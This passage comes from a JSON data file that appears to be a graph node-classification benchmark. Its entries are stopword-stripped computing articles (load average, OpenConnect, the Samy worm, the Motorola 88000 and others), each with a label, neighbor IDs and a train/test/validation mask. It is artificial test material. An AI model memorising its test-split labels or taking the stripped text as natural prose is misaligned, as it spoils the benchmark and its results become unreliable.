graphics processing unit gpu evolution westmere architecture also featured cpu gpu package",
    "neighbors": [
      3586,
      9741,
      398,
      3472,
      7442,
      10130,
      11417,
      8090,
      1563,
      8730,
      799,
      10658,
      426,
      3883,
      4270,
      3892,
      8629,
      6339,
      2635,
      1614,
      2383,
      7247,
      3537,
      5073,
      4444,
      2525,
      8931,
      2791,
      4717,
      4334,
      7151,
      1776,
      499,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 8036,
    "label": 2,
    "text": "Load_(computing):load computing unix unix-like systems generate dimensionless metric three load average numbers kernel users easily query current result unix shell running uptime command w top commands show three load average numbers range graphical user interface utilities linux also accessed reading codice_1 file idle computer load number 0 idle process n't counted process using waiting cpu ready queue run queue increments load number 1 process terminates decrements 1 unix systems count processes running cpu runnable waiting cpu states however linux also includes processes uninterruptible sleep states usually waiting disk activity lead markedly different results many processes remain blocked i/o due busy stalled i/o system example includes processes blocking due nfs server failure slow media e.g. usb 1.x storage devices circumstances result elevated load average reflect actual increase cpu use still gives idea long users wait systems calculate load average exponentially damped/weighted moving average load number three values load average refer past one five fifteen minutes system operation mathematically speaking three values always average system load since system started decay exponentially decay different speeds decay exponentially e 1 5 15 minutes respectively hence 1-minute load average consists 63 precisely 1 1/ e load last minute 37 1/ e average load since start excluding last minute 5- 15-minute load averages 63 /37 ratio computed 5 minutes 15 minutes respectively therefore technically accurate 1-minute load average includes last 60 seconds activity includes 37 activity past correct state includes mostly last minute single-cpu systems cpu bound one think load average measure system utilization respective time period systems multiple cpus one must divide load number processors order get comparable measure example one interpret load average 1.73 0.60 7.98 single-cpu system means system cpu disk memory etc could handled work scheduled last minute 1.73 times fast system four cpus load average 3.73 would indicate average 3.73 processes ready run one could scheduled cpu modern unix systems treatment threading respect load averages varies systems treat threads processes purposes load average calculation thread waiting run add 1 load however systems especially systems implementing so-called use different strategies counting process exactly purpose load regardless number threads counting threads currently exposed user-thread scheduler kernel may depend level concurrency set process linux appears count thread separately adding 1 load comparative study different load indices carried ferrari et al reported cpu load information based upon cpu queue length much better load balancing compared cpu utilization reason cpu queue length better probably host heavily loaded cpu utilization likely close 100 unable reflect exact load level utilization contrast cpu queue lengths directly reflect amount load cpu example two systems one 3 6 processes queue likely utilizations close 100 although obviously differ linux systems load-average calculated clock tick driven variable value based hz frequency setting tested clock tick hz variable pulse rate particular linux kernel activity 1 hz equal one clock tick 10ms default although hz value configured versions kernel normally set 100 calculation code uses hz value determine cpu load calculation frequency specifically timer.c :calc_load function run algorithm every 5 hz roughly five times per second following function entirety countdown 5 hz avenrun array contains 1-minute 5-minute 15-minute average macro associated values defined sched.h commands assessing system performance include",
    "neighbors": [
      3586,
      4423,
      3752,
      5831,
      810,
      6281,
      2222,
      1776,
      11442,
      7188,
      9300,
      9174,
      823,
      9016,
      1849,
      3226
    ],
    "mask": "None"
  },
  {
    "node_id": 8037,
    "label": 3,
    "text": "Object_code:object code computing object code object module product compiler general sense object code sequence statements instructions computer language usually machine code language i.e. binary intermediate language register transfer language rtl term indicates code goal result compiling process early sources referring source code subject program object files turn linked form executable file library file order used object code must either placed executable file library file object file object code portion machine code yet linked complete program machine code one particular library module make completed product may also contain placeholders offsets found machine code completed program linker use connect everything together whereas machine code binary code executed directly cpu object code jumps partially parameterized linker fill assembler used convert assembly code machine code object code linker links several object library files generate executable assemblers also assemble directly machine code executable files without object intermediary step",
    "neighbors": [
      1409,
      1922,
      7173,
      8069,
      8966,
      6664,
      6921,
      3468,
      9996,
      4112,
      1683,
      5783,
      10013,
      7071,
      1952,
      8609,
      5154,
      7462,
      3624,
      814,
      5040,
      1715,
      7032,
      1461,
      4535,
      7479,
      3386,
      2620,
      1724,
      7612,
      10044,
      10176,
      9921,
      1730,
      2370,
      4424,
      5065,
      3659,
      9291,
      6477,
      10703,
      3410,
      3413,
      8280,
      7421,
      9432,
      477,
      1502,
      3553,
      6753,
      10470,
      8680,
      107,
      10732,
      1775,
      5872,
      3186,
      9714,
      2804,
      2808,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8038,
    "label": 1,
    "text": "EPassport_gates:epassport gates epassport gates automated self-service barriers automated border control system operated united kingdom border force located immigration checkpoints arrival halls airports across uk international railway terminals abroad offering alternative using desks staffed immigration officers gates use facial recognition technology verify traveller identity data stored chip biometric passport well run data numerous databases determine traveller security risk british citizens european economic area swiss citizens aged 12 holding biometric passports eligible use epassport gates epassport gates usually marked symbol holder nationality shown british overseas territories citizen british overseas citizen british subject british national overseas british protected person holder able use epassport gates travellers using passports hong kong taiwan enrolled registered traveller service use epassport gates provided aged either 18 12 travelling adult holding valid biometric passports epassport gates accept national identity cards use epassport gates traveller must biometric passport united kingdom certain countries epassports biometric logo front cover epassport gate scanner reads information contained chip inside passport camera takes picture traveller officer control station behind gates checks image captured camera matches one passport facial recognition data verification facial recognition process complete doors automatically either open signifying traveller permitted enter and/or exit country remain closed stop icon illuminate demonstrating traveller failed security checks personally meet immigration officials present epassport gates available following locations",
    "neighbors": [
      11138,
      2876,
      10685
    ],
    "mask": "None"
  },
  {
    "node_id": 8039,
    "label": 4,
    "text": "OpenConnect:openconnect openconnect open-source software application connecting virtual private networks vpn implement secure point-to-point connections originally written open-source replacement cisco proprietary anyconnect ssl vpn client supported several cisco routers openconnect project also offers anyconnect-compatible server ocserv thus offers full client-server vpn solution openconnect client added support juniper networks ssl vpn version 7.05 fork developed support palo alto networks globalprotect vpn included version 8.00 release cisco anyconnect vpns utilize tls authenticate configure routing dtls efficiently encrypt transport tunneled vpn traffic fall back tls-based transport firewalls block udp-based traffic dtls protocol used cisco anyconnect servers based non-standard pre-release draft dtls 1.0 support dtls 1.2 standard added 2018 openconnect ocserv implement extended version anyconnect vpn protocol proposed internet standard within open-source project unaffiliated cisco openconnect ocserv strive maintain seamless backwards-compatibility cisco anyconnect servers clients openconnect client also implements juniper globalprotect vpn protocols similar structure anyconnect protocol authenticate configure routing tls except use esp efficient encrypted transport tunneled traffic instead dtls fall back tls-based transport openconnect client written primarily c contains much infrastructure necessary add additional vpn protocols operating similar flow connect via common user interface openconnect available solaris linux openbsd freebsd macos graphical user interface clients windows 2000/xp/vista/7 gnome kde graphical client openconnect also available android devices integrated router firmware packages openwrt useful usage information",
    "neighbors": [
      10889,
      6794,
      9722,
      8211,
      11413,
      11162,
      3742,
      9764,
      8998,
      4268,
      10417,
      7859,
      2228,
      823,
      11577,
      3777,
      2884,
      5959,
      8265,
      11468,
      11133,
      7376,
      11221,
      11606,
      2136,
      9048,
      6490,
      6364,
      5084,
      479,
      10210,
      9318,
      11248,
      5749,
      3322,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 8040,
    "label": 2,
    "text": "Cryptographic_Service_Provider:cryptographic service provider microsoft windows cryptographic service provider csp software library implements microsoft cryptoapi capi csps implement encoding decoding functions computer application programs may use example implement strong user authentication secure email csps independent modules used different applications user program calls cryptoapi functions redirected csps functions since csps responsible implementing cryptographic algorithms standards applications need concerned security details furthermore one application define csp going use calls cryptoapi fact cryptographic activity implemented csps cryptoapi works bridge application csp csps implemented basically special type dll special restrictions loading use every csp must digitally signed microsoft signature verified windows loads csp addition loaded windows periodically re-scans csp detect tampering either malicious software computer viruses user him/herself trying circumvent restrictions example cryptographic key length might built csp code obtain signature non-microsoft csp developers must supply paperwork microsoft promising obey various legal restrictions giving valid contact information circa 2000 microsoft charge fees supply signatures development testing purposes csp developer configure windows recognize developer signatures instead microsoft somewhat complex obscure operation unsuitable nontechnical end users capi/csp architecture origins era restrictive us government controls export cryptography microsoft default base csp included windows limited 512-bit rsa public-key cryptography 40-bit symmetric cryptography maximum key lengths permitted exportable mass market software time csps implementing stronger cryptography available u.s. residents unless csps received u.s. government export approval system requiring csps signed presentation completed paperwork intended prevent easy spread unauthorized csps implemented anonymous foreign developers presented concession made microsoft government order get export approval capi bernstein v. united states court decision establishing computer source code protected free speech transfer cryptographic regulatory authority u.s. state department pro-export commerce department restrictions key lengths dropped csps shipped windows include full-strength cryptography main use third-party csps interface external cryptography hardware hardware security modules hsm smart cards cryptographic functions realised smart card thus smart card csp microsoft way pkcs 11 microsoft windows identifying correct smart card csp used analysing answer reset atr smart card registered windows registry installing new csp atrs supported smart cards enlisted registry cryptographic service providers used encryption word excel powerpoint documents starting microsoft office xp standard encryption algorithm 40-bit key used default enabling csp enhances key length thus makes decryption process continuous applies passwords required open document password type one encrypts password-protected document",
    "neighbors": [
      8674,
      11144,
      2027,
      9196,
      3629,
      2221,
      6797,
      9745,
      3890,
      7739
    ],
    "mask": "Test"
  },
  {
    "node_id": 8041,
    "label": 9,
    "text": "Urbiscript:urbiscript urbiscript programming language robotics features syntactic support concurrency event-based programming prototype-based object-oriented scripting language dynamic name resolution performed program execution late binding slots member variables added/removed runtime even prototypes superclasses object changed runtime memory management performed reference counting tightly bound urbi platform supports seamless integration c++/java components syntactical point view urbiscript belongs c-family programming languages prototype-based object-oriented design influenced self io programming languages designed program also interact robots influenced unix shells languages provide read-eval-print loop style interactive toplevel however contrary others prompt user input answers system prefixed timestamp milliseconds square brackets urbiscript statements include among others actually contrary c-like languages despite syntax suggests statements value therefore expressions provided embedded braces urbiscript control-flow constructs come several flavors two types sequential composition two types concurrent composition hood concurrency implemented using coroutines like c semicolon denotes sequential composition codice_13 stands run statement codice_14 run statement codice_15 tasks may run codice_14 codice_15 another statement separator pipe denotes tight sequential composition task run codice_14 codice_15 codice_20 similarly urbiscript features two means compose statements concurrently codice_21 first codice_14 run point codice_15 -- possibly codice_14 still running similar codice_25 operator unix shells alternatively codice_26 codice_14 codice_15 started together interactive sessions means codice_14 wo n't run codice_15 fully entered properly followed either codice_31 codice_32 scopes boundaries backgrounded jobs demonstrated following example looping constructs urbiscript come several flavors based four statement separators codice_31 codice_34 codice_32 codice_25 instance displays i.e. loop bodies executed sequentially codice_37 keyword runs loop bodies concurrently aiming development portable robotic applications urbiscript relies specific syntactic constructs specify reactive behaviors go charging dock battery low play friendly sound known face recognized stop obstacle detected event handling goes three steps first define event second specify event handlers third emit event events payloads event handlers enjoy pattern matching payload urbiscript language also allows monitor expressions following example demonstrates feature",
    "neighbors": [
      2048,
      9345,
      11361,
      9320,
      5612,
      4750,
      7983,
      8221,
      9490,
      9780,
      11221,
      10198,
      155,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8042,
    "label": 4,
    "text": "National_Cybersecurity_FFRDC:national cybersecurity ffrdc national cybersecurity ffrdc ncf federally funded research development center operated mitre corporation supports u.s. national institute standards technology national cybersecurity center excellence ncf first march 2017 federally funded research development center dedicated solely cybersecurity national cybersecurity ffrdc located 9700 great seneca hwy rockville maryland ncf mission increase cybersecurity business community providing practical guidance increasing adoption rate secure technologies accelerating innovation supports department commerce goal protecting economy ncf also fosters public-private collaborations identify solve cybersecurity threats nist ’ work others program non-profits federal state local agencies access cybersecurity technologies talent ncf contract operate ffrdc awarded september 2014 nist mitre corporation press release stated ffrdcs operate public interest required free organizational conflicts interest well bias toward particular company technology product—key attributes given nccoe ’ collaborative nature…the first three task orders contract allowed nccoe expand efforts developing use cases building blocks provide operations management facilities planning",
    "neighbors": [
      4826,
      2709,
      6423
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8043,
    "label": 9,
    "text": "Extension_Language_Kit:extension language kit extension language kit elk free scheme implementation embeddable c c++ programs also used stand-alone scheme interpreter available custom permissive license use commercial noncommercial elk written oliver laumann carsten bormann provide extension language development large c++-based systems oda document editor isotext videoconferencing system teles.vision inspired lisp interpreter emacs turn helped inspire developers dynamic language interpreters matz ruby interpreter 2005 sam hocevar became current maintainer elk scheme project merging contributed patches fixing known bugs",
    "neighbors": [
      9245,
      10083,
      2045,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 8044,
    "label": 7,
    "text": "Nettop:nettop nettop miniature pc mini pc smart micro pc small-sized inexpensive low-power legacy-free desktop computer designed basic tasks web browsing accessing web-based applications document processing audio/video playback word nettop portmanteau network desktop desktop counterpart netbook compared ordinary desktop computers nettops smaller cheaper also consume much less power example compulab fit-pc2 consumes 8 watts power whereas typical desktop would easily consume 100 watts power consequently nettops require significantly less cooling may even completely fanless optical disk drive use solid state drive making completely silent tradeoff hardware specifications processing power usually reduced hence make nettops less appropriate running complex resource-intensive applications nettops mini pcs could considered unusual history first wave devices occurred mid late 2000s commonly referred nettops included devices acer aspirerevo seen commonly considered kind temporary substitute pc lower cost users needing second pc use developing countries another commonly held view time use stepping stone towards thin client-based always online computer would replace inefficient pcs demand devices quickly waned industry responded addressing chief complaint devices would better portable devices new form laptop result netbook device considered true future nettop however prevailing attitudes economic issues 2008 onward made popular due low cost portability along then-expanding feature-set august 2009 reports reviewers netbook time traditional laptop price otherwise identical implications price standard notebooks dropped financial liability due huge unsold inventories standard laptops retail chains unfavorable market unload meant cannibalisation laptop sales netbooks would financially undesirable industry clearance sale also option conditions especially among multiple retail chains online shopping sites factors along desire keep netbook sales going recoup r design manufacturing costs likely contributing factors industry-wide effort sabotage netbooks purposefully limited devices could sold cheaply acting form social engineering towards discrediting netbook devices direct lineage nettops netbooks meant concept net- prefix considered failed idea devices chromebooks tablet pcs ultrabooks devices responded branding different type device chrome os exclusively pure web client proposal ultrabook succeeded compensating lighter weight otherwise equal-performance parts higher price tag 2015 revival concept came likely unrelated source technological form convergent evolution via likely-observed success stick pc idea combining system chip single-board computer led continuation nettop original product goals mini pcs minix z83-4 azulle access plus exclusively referred mini pcs despite identical near-identical paper nettop architecture three platforms primarily intended nettops netbooks nettops also adopted system-on-a-chip designs although many major parts chipsets video cards storage devices also found desktops cpus put inside nettops fundamental component differentiate normal desktops list contains range hardware components typical nettop may assembled intel atom processor adopted several hardware manufacturers asus msi sony nettops nvidia also released first generation ion platform puts geforce 9400m motherboard gpu alongside atom processor provide better high definition video playback ability lower power consumption addition nvidia announced support via cpus year reduce manufacturing cost improve power efficiency many manufacturers start-up companies chosen use cpus originally targeted embedded computing devices amd geode arm cortex-based cpus many net-top models x86-processor-based capable running standard pc oses also operating systems designed specifically nettops machines performance class high-end nettops capable running windows 10 google android linux distribution another option although google android originally designed smartphones also taken seat nettop market another linux system ubuntu nettops fell intel category basic pc usually cost 100 299 intel described nettops large potential market time nettops said able serve affordable first computer people developing countries environmentally friendly choice secondary computer people developed countries however stated primary flaw average consumer far useful portable system led development netbooks midst economic crisis netbooks seen hurting sales traditional laptops likely collaborative effort destroy demand hence original source computer class died marketplace result successes stick pcs linux mint-based nettop-like computers well continued success mac mini idea possibly unintentionally revived mini pcs continue sold online retailers august 2017",
    "neighbors": [
      6913,
      3586,
      1032,
      4236,
      9101,
      10893,
      911,
      1935,
      4623,
      8592,
      6419,
      6804,
      405,
      2965,
      10768,
      2328,
      4377,
      8986,
      9851,
      6307,
      9766,
      5159,
      426,
      6444,
      8495,
      3121,
      5681,
      10675,
      7352,
      1083,
      2496,
      4289,
      7234,
      5444,
      1224,
      1480,
      8520,
      4429,
      7248,
      3537,
      1362,
      467,
      9682,
      3162,
      6618,
      6367,
      2784,
      4194,
      11646,
      5732,
      6632,
      10090,
      3819,
      7660,
      9964,
      10223,
      9970,
      499,
      2170,
      5499,
      253,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 8045,
    "label": 9,
    "text": "Samy_(computer_worm):samy computer worm samy also known js.spacehero cross-site scripting worm xss worm designed propagate across social networking site myspace samy kamkar within 20 hours october 4 2005 release one million users run payload making samy fastest spreading virus time worm relatively harmless carried payload would display string samy hero victim myspace profile page well send samy friend request user viewed profile page payload would replicated planted profile page continuing distribution worm myspace since secured site vulnerability samy kamkar author worm raided united states secret service electronic crimes task force 2006 releasing worm entered plea agreement january 31 2007 felony charge action resulted kamkar sentenced three years probation one computer use internet 90 days community service 15,000- 20,000 usd restitution directly reported samy kamkar greatest moments hacking history vice media video website motherboard",
    "neighbors": [
      3072,
      5636,
      3852,
      9630,
      803,
      2470,
      7855,
      10297,
      7739,
      3704,
      1113,
      7515,
      4830,
      5087,
      4063,
      2147,
      1381,
      1254,
      4198,
      7659,
      4462,
      3700,
      6520,
      2041
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8046,
    "label": 0,
    "text": "Natural-language_user_interface:natural-language user interface natural-language user interface lui nlui type computer human interface linguistic phenomena verbs phrases clauses act ui controls creating selecting modifying data software applications interface design natural-language interfaces sought speed ease use suffer challenges understanding wide varieties ambiguous input natural-language interfaces active area study field natural-language processing computational linguistics intuitive general natural-language interface one active goals semantic web text interfaces natural varying degrees many formal un-natural programming languages incorporate idioms natural human language likewise traditional keyword search engine could described shallow natural-language user interface natural-language search engine would theory find targeted answers user questions opposed keyword search example confronted question form 'which u.s. state highest income tax conventional search engines ignore question instead search keywords 'state 'income 'tax natural-language search hand attempts use natural-language processing understand nature question search return subset web contains answer question works results would higher relevance results keyword search engine prototype nl interfaces already appeared late sixties early seventies natural-language interfaces past led users anthropomorphize computer least attribute intelligence machines warranted part user led unrealistic expectations capabilities system expectations make difficult learn restrictions system users attribute much capability ultimately lead disappointment system fails perform expected case ai winter 1970s 80s 1995 paper titled 'natural language interfaces databases – introduction describes challenges goals consider generally speed efficiency interface algorithms two points main point determine methods better others therefore greater success market addition localisation across multiple language sites requires extra consideration based differing sentence structure language syntax variations languages finally regarding methods used main problem solved creating general algorithm recognize entire spectrum different voices disregarding nationality gender age significant differences extracted features even speakers says word phrase must successfully overcome natural-language interface gives rise technology used many different applications main uses named defined applications use natural-language recognition integrated utilities listed ubiquity add-on mozilla firefox collection quick easy natural-language-derived commands act mashups web services thus allowing users get information relate current webpages wolfram alpha online service answers factual queries directly computing answer structured data rather providing list documents web pages might contain answer search engine would announced march 2009 stephen wolfram released public may 15 2009 siri intelligent personal assistant application integrated operating system ios application uses natural language processing answer questions make recommendations siri marketing claims include adapts user individual preferences time personalizes results performs tasks making dinner reservations trying catch cab",
    "neighbors": [
      5122,
      2440,
      2059,
      140,
      3979,
      2318,
      6798,
      4624,
      11538,
      10231,
      1044,
      5399,
      538,
      7069,
      4782,
      7599,
      4531,
      4662,
      3127,
      823,
      2488,
      3389,
      7614,
      8639,
      6208,
      10557,
      7106,
      1603,
      6341,
      5830,
      5319,
      10313,
      3533,
      5197,
      6223,
      10452,
      8538,
      5857,
      1890,
      9569,
      7780,
      8421,
      8806,
      4713,
      7918,
      8046,
      8688,
      113,
      3191,
      8440,
      3323,
      7164,
      10878
    ],
    "mask": "Test"
  },
  {
    "node_id": 8047,
    "label": 4,
    "text": "Core_Security_Technologies:core security technologies core security american computer network security company provides attack intelligence platform vulnerability management network penetration testing measurement software products services company ’ research arm corelabs proactively identifies new security vulnerabilities publishes public vulnerability advisories works vendors assist eliminating exposures find february 2019 helpsystems acquired core security products secureauth helpsystems minnesota-based software company working areas systems network management business intelligence security compliance 1996 core security founded buenos aires argentina one year later corelabs research group established published first advisory core conducted first penetration test u.s. company 1998 year core security recognized endeavor entrepreneur endeavor foundation foundation supports entrepreneurial projects emerging markets 2000 company first u.s. office opened new york ny two years later core released first second versions flagship penetration testing product core impact pro 2003 company u.s. headquarters relocated new york boston five years later mark hatton became ceo core security 2009 core adds development sites boston india one year later core announced beta new security testing measurement product core insight 2012 core announces partnership ncircle year core announces partnership nt objectives 2013 core security named 2013 inc. 500/5000 list 2014 core security adds intrinium partner program extends reach pacific northwest year core security announced latest version core attack intelligence platform also 2014 core security information security magazine searchsecurity.com 2014 readers choice awards excellence vulnerability management december 2015 core security acquired identity access management iam company courion may 2016 courion rebranded core security name july 2016 core security technologies acquired damballa us 9 million 2017 core security merged secureauth 2019 helpsystems acquired core security solutions secureauth damballa founded 2006 atlanta georgia merrick furst associate dean georgia institute technology georgia tech college computing joined two georgia tech colleagues wenke lee david dagon company named damballa vodou snake god protects zombies implication damballa protects “ zombie ” computers operating part botnets according site damballa seeks primarily corporate clients isp damballa ’ product offerings damballa advanced threat protection solution enterprises damballa failsafe detects successful infections certainty terminates threat activity gives incident response intelligence needed rapidly prevent data breaches damballa failsafe able detection malicious files malware track suspicious behavior time network delivering actionable information known unknown threats regardless infection ’ source entry vector os device provides incident responders definitive evidence rapidly prevent loss high-risk devices blocking activity rest recommended advanced threat protection shortlist buyer guide 2015 damballa csp designed service providers isps identifies malicious activity originating subscriber ’ devices whether pc tablet mobile damballa csp sits out-of-band inside service provider ’ network monitors dns requests non-pii traffic subscriber ’ ip address enables identify subscriber devices infected advanced malware 2013 damballa granted first two patents related detecting advanced threats patent 8,566,928 describes methods detecting first network compromised computers second network computers patent 8,578,497 describes methods analyzing domain names registered collected asset real network february 2014 company granted third patent us20120198549 method system detecting malicious domain names upper dns hierarchy describes methodology identifying potential malicious domain names used propagate threats according website core security research department core labs conducts research system vulnerabilities cyber attack planning simulation source code auditing cryptography core labs publishes security advisories technical papers project information shared software tools public use researchers participating security research conferences including black hat briefings",
    "neighbors": [
      2275,
      5636,
      10341,
      939,
      3887,
      1429,
      5174,
      7515,
      7228,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8048,
    "label": 3,
    "text": "Motorola_88000:motorola 88000 88000 m88k short risc instruction set architecture isa developed motorola 1980s 88000 arrived market 1988 two years competing sparc mips due late start extensive delays releasing second-generation mc88110 m88k achieved limited success outside mvme platform embedded controller environments motorola joined aim alliance 1991 develop powerpc development 88000 ended originally called 78000 homage famed 68000 series design went tortuous development path including number change finally emerging april 1988 initial version 88100 generally required separate mmu mc88200 88200 added mmu data instruction caches time processors mmu built-in including motorola 68030 returning separate mmu chip step backward 88100/88200 saw little use follow-on version combining cpu mmu planned 88110 late 1980s several companies actively examining 88000 series future use including next apple computer apollo computer given design time 88110 finally available 1990 attempt popularize system 88open group similar sun microsystems attempting sparc design appears failed practical sense early 1990s motorola joined aim effort create new risc architecture based ibm power architecture worked features 88000 new powerpc architecture offer customer base sort upgrade path point 88000 dumped soon possible like 68000 88000 considered clean design pure 32-bit load/store architecture using separate instruction data caches harvard architecture separate data address buses small powerful command set like motorola cpus use memory segmentation major architectural mistake integer instructions floating-point instructions used register file required single register file sufficient read write ports support integer execution unit floating-point unit connections port additional capacitive load must driven register memory cell made difficult build high frequency superscalar implementations first implementation 88000 isa mc88100 microprocessor included integrated fpu mated mc88200 mmu cache controller idea behind splitting duties allow multiprocessor systems built easily single mc88200 could support four mc88100s however also meant building basic system single processor required chips considerable wiring driving costs likely another major reason 88000 limited success later addressed superscalar mc88110 combined cpu fpu mmu l1 cache single package additional modification made behest mit *t project resulted mc88110mp including on-chip communications use multi-processor systems version capable speeds 100 mhz planned mc88120 never built implementation embedded applications mc88300 development early 1990s eventually canceled ford motor company planned use chips offered powerpc design replacement accepted motorola released series single-board computers known mvme series building box systems based 88000 well series 900 stackable computers employing mvme boards unlike tower rack mount systems series 900 sat top connected one another bus-like cabling concept never caught major 3rd party users limited widespread use would data general aviion series fairly popular remain limited use today later models dg moved intel encore computer built encore-91 machine m88k introduced completely ground-up redesign infinity 90 series unclear many machines sold encore moved alpha gec computers used 88100 build gec 4310 one gec 4000 series computers issues memory management meant n't perform well earlier gate array based am2900 based gec 4000 series computers bbn butterfly model tc-2000 used 88100 processor scaled 512 cpus linotype-hell used 88110 power workstations running davinci raster graphics editor image manipulation 88110 made versions never released next machine next risc workstation project canceled along next hardware projects 1993 4-processor omron luna-88k machines japan used m88k used short time mach kernel project carnegie mellon university early 1990s northern telecom used 88100 88110 central processor dms supernode family telephone switches users much smaller alpha microsystems originally planned migrate 88k architecture motorola 68000 internally created machine around running unix system v later scrapped favour later 68k derivatives ncd used 88100 without 88200 88k x-terminals dolphin server spin-off dying norsk data built servers based 88k around 100 systems shipped 1988-1992 virtuality used 88110 su2000 virtual reality arcade machine graphics processor one 88110 per screen virtual reality headset embedded computer space tri-channel vms computer f-15 s/mtd used three 88000s triply redundant computer motorola released unix system v derivative system v/88 88000-based systems two major releases release 3.2 version 3 release 4.0 version 3. ref name= unix system v/88 /ref data general aviion systems ran dg/ux openbsd ports exist mvme systems ref name= openbsd/mvme88k openbsd/mvme88k /ref luna-88k workstations ref name= openbsd/luna88k openbsd/luna88k /ref data general aviion systems. ref name= openbsd/aviion openbsd/aviion /ref least one unofficial experimental netbsd port exists mvme systems. ref name= netbsd/m88k netbsd/m88k unofficial port netbsd 3.x /ref",
    "neighbors": [
      1548,
      528,
      11286,
      2073,
      6187,
      10796,
      4144,
      11314,
      8761,
      6715,
      7234,
      3142,
      10851,
      7269,
      3175,
      3185,
      5235,
      7286,
      7806,
      7299,
      1158,
      7302,
      7305,
      9371,
      8861,
      6815,
      6311,
      682,
      7852,
      4269,
      9391,
      2224,
      5297,
      9911,
      11447,
      10945,
      9410,
      9932,
      10985,
      9964,
      5358,
      8944,
      5873,
      757,
      3319,
      249,
      10491,
      8450,
      3844,
      4868,
      10501,
      6415,
      1298,
      10516,
      336,
      8530,
      9044,
      3932,
      3936,
      8048,
      1399,
      8058,
      3451,
      3467,
      7065,
      7068,
      3493,
      8102,
      1971,
      2995,
      1461,
      1462,
      1983,
      9665,
      6084,
      3014,
      3017,
      6607,
      3540,
      2517,
      10734,
      10224,
      2039,
      8700,
      8190
    ],
    "mask": "Train"
  },
  {
    "node_id": 8049,
    "label": 6,
    "text": "Interleaving_(disk_storage):interleaving disk storage disk storage drum memory interleaving technique used improve access performance storage putting data accessed sequentially non-sequential sectors number physical sectors consecutive logical sectors called interleave skip factor skip factor historically interleaving used ordering block storage storage devices drums floppy disk drives hard disk drives primary purpose interleaving adjust timing differences computer ready transfer data data actually arriving drive head read interleaving common prior 1990s faded use processing speeds increased modern disk storage interleaved interleaving used arrange sectors efficient manner possible reading sector time would permitted processing next sector sequence ready read computer ready matching sector interleave processing speed therefore accelerates data transfer incorrect interleave make system perform markedly slower information commonly stored disk storage small pieces referred sectors blocks arranged concentric rings referred tracks across surface disk may seem easiest order blocks direct serial order track 1 2 3 4 5 6 7 8 9 early computing devices ordering practical data written read put special region reusable memory referred buffer data needed written moved buffer written buffer disk data read reverse took place transferring first buffer moved needed early computers fast enough read sector move data buffer somewhere else ready read next sector time next sector appearing read head sectors arranged direct serial order first sector read computer may spend time takes example three sectors pass ready receive data however sectors direct order sector two three four already passed computer n't need sectors 4 5 6 7 8 9 1 must wait pass reading sector two waiting disk spin around right spot slows data transfer rate correct processing delays ideal interleave system would 1:4 ordering sectors like 1 8 6 4 2 9 7 5 3 reads sector 1 processes three sectors whereby 8 6 4 pass computer becomes ready sector two arriving needed 1:1 interleave skip factor 0 places sectors sequentially—1 2 3 4 5 6 ... modern disk storage need interleaving data commonly stored clusters groups sectors data buffer sufficiently large allow sectors block read without delay sectors",
    "neighbors": [
      3841,
      3315,
      8129,
      2159
    ],
    "mask": "Test"
  },
  {
    "node_id": 8050,
    "label": 4,
    "text": "Open_Source_Vulnerability_Database:open source vulnerability database open sourced vulnerability database osvdb independent open-sourced vulnerability database goal project provide accurate detailed current unbiased technical information security vulnerabilities project promoted greater open collaboration companies individuals goal provide accurate unbiased information security vulnerabilities computerized equipment core osvdb relational database tied various information security vulnerabilities common cross-referenced open security data source november 2013 database cataloged 100,000 vulnerabilities project started august 2002 blackhat def con conferences several industry notables including h. d. moore rain.forest.puppy others mostly-new management database officially launched public march 31 2004 open security foundation osf created ensure project continuing support brian martin aka jericho jake kouns project leaders osvdb project currently hold leadership roles osf client/server implementation consists server daemon mysqld many different client programs/libraries pluggable data store architecture 5 april 2016 database shut although blog continue originally vulnerability reports advisories exploits posted various security lists enter database new entry new entry contains title links entries vulnerability security lists however stage page new entry n't contain detailed description vulnerability new entries thoroughly scrutinized analyzed refined descriptions vulnerability solutions test notes added details reviewed members osvdb refined necessary made stable stable detailed information appears page entry january 2012 vulnerability entry performed full-time employees osf every new entry included title description solution known classification data references products creditee enthusiastic hackers volunteering maintain osvdb active members follows volunteers helped past include open security foundation non-profit 501 c 3 organization established early 2005 function support organization open source security projects originally conceived founded support osvdb project scope evolving provide support numerous projects foundation allows organizations individuals provide charitable contributions support open source security projects provide value global community foundation also provides guidance legal administrative policy guidelines support numerous projects open security foundation conceived chris sullo brian martin jake kouns early 2004 obtained official us 501 c 3 non-profit status april 2005",
    "neighbors": [
      2275,
      8488,
      2446,
      8764,
      5373,
      4062
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8051,
    "label": 2,
    "text": "ISPW:ispw ircam signal processing workstation ispw hardware dsp platform developed ircam ariel corporation late 1980s french ispw referred sim station d'informatique musicale eric lindemann principal designer ispw hardware well manager overall hardware/software effort consisted three customized dsp boards could plugged expansion bus next computer cube ispw could run customized real-time audio processing server hardware boards controlled client application next ispw card two intel i860 microprocessors running 80 mflops additional card eight channels audio i/o also available multi-channel sound recording playback three-board ispw provided time unsurpassed signal processing audio synthesis power single workstation single ispw card cost approximately 12,000us including computer made prohibitively expensive outside research institutes universities i860 board main server software developed ircam ispw called fts faster sound main next client application graphical program called max developed miller puckette commercial version max without fts server licensed ircam opcode systems later cycling '74 max/fts eventually migrated software-only application sgi dec alpha computers direct predecessor jmax see also pd",
    "neighbors": [
      10051,
      4490,
      7571,
      7769,
      7806
    ],
    "mask": "None"
  },
  {
    "node_id": 8052,
    "label": 6,
